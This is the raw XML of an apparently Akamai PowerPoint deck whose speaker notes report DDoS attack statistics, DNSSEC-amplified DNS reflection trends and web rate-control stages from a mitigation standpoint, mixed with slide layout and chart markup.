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340" r:id="rId2"/>
    <p:sldId id="408" r:id="rId3"/>
    <p:sldId id="454" r:id="rId4"/>
    <p:sldId id="449" r:id="rId5"/>
    <p:sldId id="424" r:id="rId6"/>
    <p:sldId id="426" r:id="rId7"/>
    <p:sldId id="432" r:id="rId8"/>
    <p:sldId id="446" r:id="rId9"/>
    <p:sldId id="431" r:id="rId10"/>
    <p:sldId id="448" r:id="rId11"/>
    <p:sldId id="455" r:id="rId12"/>
    <p:sldId id="450" r:id="rId13"/>
    <p:sldId id="443" r:id="rId14"/>
    <p:sldId id="392" r:id="rId15"/>
    <p:sldId id="434" r:id="rId16"/>
    <p:sldId id="433" r:id="rId17"/>
    <p:sldId id="410" r:id="rId18"/>
    <p:sldId id="412" r:id="rId19"/>
    <p:sldId id="413" r:id="rId20"/>
    <p:sldId id="415" r:id="rId21"/>
    <p:sldId id="416" r:id="rId22"/>
    <p:sldId id="436" r:id="rId23"/>
    <p:sldId id="444" r:id="rId24"/>
    <p:sldId id="445" r:id="rId25"/>
    <p:sldId id="417" r:id="rId26"/>
    <p:sldId id="451" r:id="rId27"/>
    <p:sldId id="439" r:id="rId28"/>
    <p:sldId id="440" r:id="rId29"/>
    <p:sldId id="441" r:id="rId30"/>
    <p:sldId id="442" r:id="rId31"/>
    <p:sldId id="389" r:id="rId32"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultText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orient="horz" pos="529">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1392">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="4261">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="485">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="5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191919"/>
    <a:srgbClr val="2196C6"/>
    <a:srgbClr val="FF9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8980" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="629" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="5120"/>
        <p:guide orient="horz" pos="529"/>
        <p:guide orient="horz" pos="1392"/>
        <p:guide pos="4261"/>
        <p:guide pos="485"/>
        <p:guide pos="570"/>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m\Documents\attack_s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8311461067358E-2"/>
          <c:y val="1.747321706766853E-2"/>
          <c:w val="0.90406559271834142"/>
          <c:h val="0.89648051144026542"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numLit>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Lit>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$2:$N$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>82</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>190</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>321</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>309</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>623</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>109</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1350</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-86D8-49BC-BF6B-D94DCD0722C4}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="126591744"/>
        <c:axId val="126593280"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="126591744"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="126593280"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="126593280"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="1265917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27A5B-6AA7-4831-AE90-933BF8015E5C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/10/2021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B2F9F-BBE6-43A5-B27A-C013A4A6E474}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148936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9016-F88A-4BD5-941D-B455B73AB02B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9/10/2021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09F6-2038-456A-9430-D3278C72B9DD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2414062692"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:notesStyle>
    <a:lvl1pPr marL="0" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="653044" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="1306090" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1959135" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="2612181" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="3265225" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="3918270" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="4571314" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="5224359" algn="l" defTabSz="130609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000" b="1"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7FDC09F6-2038-456A-9430-D3278C72B9DD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1139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A record 19 attacks exceeded 100 Gbps, the largest hitting the software &amp; technology, gaming, and media &amp; entertainment sectors.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That’s a significant increase from the five DDoS attacks that registered more than 100 Gbps in Q4 2015.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Looking back further, there were 8 mega attacks in Q3 2015 and 17 inQ3 2014 — the previous record.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In Q1 2016, the largest DDoS attack measured 289 Gbps, a 20-point drop over the largest attack in the previous quarter (309 Gbps).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Most of the mega attacks seemed to use tools common to booters/stressers.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Of the 19 mega attacks, 14 used dns reflection attacks. Although not as powerful as the early days of dns reflection, these campaigns produced significant attack bandwidth partly due to the increased amplification factor produced by the use of Domain Name System Security Extensions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) domains.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0B6138C-E721-E14B-B05C-1EF830564EB3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361410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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The target of the spotlight attack was an Akamai customer in the media industry. Media sites often become targets based on the news they publish. Groups such as Anonymous often use DDoS attacks as a form of digital protest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The spotlight attack was distributed and mitigated across five scrubbing centers, as depicted in the next slide. The bulk of the traffic was routed through Akamai’s Frankfurt scrubbing center.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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The tools used in these attacks are accessible to even lesser-skilled actors. Using sites offering stress-testing services makes it difficult for the target to determine true attribution.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attack included both UDP fragment and DNS attack vectors.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One standout was the abuse of domains that were DNSSEC-ENABLED.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This is not a new attack method; however, the increased use of DNSSEC enabled legitimate domains is being leveraged by malicious actors in the latest flurry of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the earlier days of DNS attacks, it was common to see domains that were purposely set up to produce the highest possible amplification factor. By using a legitimate domain with DNSSEC-enabled, mitigation becomes a bit more complicated. If all DNS resolution requests for these domains are dropped, this could potentially result in a Denial of Service (DoS) effect for legitimate users of the abused domain.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addition to mitigation issues for the DNS resolver, some DNSSEC-enabled domains have produced response sizes in excess of 4,000 bytes. This extra-large payload size makes DNSSEC-enabled domains attractive to use in reflection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problem is that open DNS resolvers attempt to resolve any domain, even if the server does not have the domain configured locally. In the latter case, the DNS resolvers will send a query out to the domain and will often cache the response. During an attack, a rapid rate of queries is continuously sent to the open DNS resolver, which dutifully responds to the listed source address.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an attack scenario, the target host receiving the unsolicited dns reply traffic would not attempt a tcp retry, since it never made the request. In reality, the traffic would likely never reach the target server due to filtering at the edge of the network. But it can still cause issues due to the amount of traffic generated by the large dns response floods. In this case, the dns flood generated 230 Gbps.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0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="11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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19744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a:t>Rate accounting can be done at various stages of the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> HTTP message’s path through the Akamai host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The orange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> dots indicate where the rate accounting is done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The first stage that an incoming request </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of where the different stages are applicable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Client Request – Block bots from scouring pages from site (cached or non-cached)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	   - Also if you want to “clock/account” all requests to your site, not just those that are not cached.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Forward Request – Requests just before they are served to the origin server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	       - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Usefull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> if you do not want to account for requests that get served off origin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Forward Response – Accounts the responses observed from the origin server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The request/response that finally pushes the rate control over the edge is allowed through all subsequent request will put in the penalty box.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214348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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76244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2040433"/>
            <a:ext cx="10607040" cy="747439"/>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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="3096449"/>
            <a:ext cx="6550677" cy="501217"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="915897" indent="0">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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1732656"/>
            <a:ext cx="10607040" cy="1362992"/>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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="3391264"/>
            <a:ext cx="8322971" cy="501217"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="915897" indent="0">
              <a:defRPr sz="2400">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7270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600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1147364" indent="242624">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3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58414"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5200"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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756174" y="1554480"/>
            <a:ext cx="6461760" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3100"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:tabLst>
                <a:tab pos="165529" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:tabLst/>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6762753" y="2854024"/>
            <a:ext cx="7867650"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Avoid data theft and downtime by extending the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security perimeter outside the data-center and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protect from increasing frequency, scale and sophistication of web attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFF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46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Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762750" y="2898851"/>
            <a:ext cx="7545389"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Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="511176" y="428626"/>
            <a:ext cx="187325" cy="5937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73161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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="823808" y="1508761"/>
            <a:ext cx="8731382" cy="5532120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54790" tIns="27391" rIns="54790" bIns="2739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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="778091" y="365766"/>
            <a:ext cx="11428512" cy="805816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54790" tIns="27391" rIns="54790" bIns="27391"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154460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243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9886"/>
            <a:ext cx="14630400" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="731523" y="457200"/>
            <a:ext cx="11775614" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130609" tIns="65305" rIns="130609" bIns="65305"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731520" y="1554480"/>
            <a:ext cx="13167360" cy="5796916"/>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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="4533518" y="7824216"/>
            <a:ext cx="5608320" cy="405384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130609" tIns="65305" rIns="130609" bIns="65305" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="1306090" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>©2017 AKAMAI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>  |  FASTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
